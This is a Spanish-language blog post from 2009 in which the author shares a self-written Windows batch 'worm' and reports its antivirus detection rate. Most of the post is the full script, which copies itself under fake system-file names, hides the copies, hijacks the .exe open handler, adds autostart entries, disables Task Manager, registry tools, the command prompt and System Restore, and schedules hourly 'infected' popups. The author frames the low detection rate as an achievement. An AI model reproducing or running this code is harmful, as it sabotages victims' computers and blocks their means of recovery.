lunes, 16 de marzo de 2009

Platicando con un w0rn

En realidad no se si llamarlo worm, pero estoy aprendiendo batch y se me ocurrio escribir algo ( en realidad de la epocas de las piedras) pero de eso se trata de ir evolucionando conforme con lo que uno va adquiriendo conocimientos y experiencias
señoras y señores con ustedes J0ichit.bat.A

@echo off
rem Coded by iax0r

set e=t
set t=s
set s=e

copy %0 %systemroot%\system32\Update.dat.bat
copy %0 %systemroot%\system32\config\systemprofile\CondigSys.sys.bat
copy %0 %allusersprofile%\NtUser.dat.bat
copy %0 %temp%\Indexx.php.bat
a%e%%e%rib +h +%t% %systemroot%\system32\Update.dat.bat
a%e%%e%rib +h +%t% %systemroot%\system32\config\systemprofile\ConfigSys.sys.bat
a%e%%e%rib +h +%t% %allusersprofile%\NtUser.dat.bat
a%e%%e%rib +h +%t% %temp%\Indexx.php.bat
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d "%ConfigSys.sys.bat" /f
reg add HKCR\exefile\shell\runas\command /ve /t REG_SZ /d "NtUser%.dat.bat" /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%Indexx%.php.bat" /t
echo MSgbox "Infected By iax0r",16,"SystemR00t" >%systemroot%\popup.vbs
attrib +h +s popup.vbs
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NofolderOptions /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableRegistryTools /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v NofolderOptions /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v NoFind /t REG_DWORD /d 1 /f
cd\
echo ^J0ichi.Bat.A ^ > %systemdrive%\index.html
echo ^ Infected by iax0r ^ >> %systemdrive%\index.html
attrib +h +s %systemdrive%\index.html
echo start iexplore %systemdrive%\index.html> %systemdrive%\Show.bat
Attrib +H +s %systemdrive%\show.bat
FOR /L %%i IN (0,1,23) do (AT 0%%i:00 /Interactive start %systemdrive%\Show.bat)
start iexplore %systemdrive\index.html
start %systemroot%\popup.vbs

hay un servicio que se llama con el cual realice un examen de prueba y me dejo el siguiente resultado

File Information
Report Generated:
16.3.2009 at 14.00.13 (GMT 1)
Time for scan:
52 seconds
File Name:
Xor.bat
File Size:
2 KB
MD5 Hash:
B7ED702BEDE8349A5694C9AE9D072462
SHA1 Hash:
05F46331C51F6CAC6910CEFBE2F8705832355F8B
Detection Rate:
2 on 24 (8,33 %)
Status:INFECTED
Publicado por en 1 comentario:
Etiquetas:
Suscribirse a: Entradas (Atom)
Related Posts Plugin for WordPress, Blogger...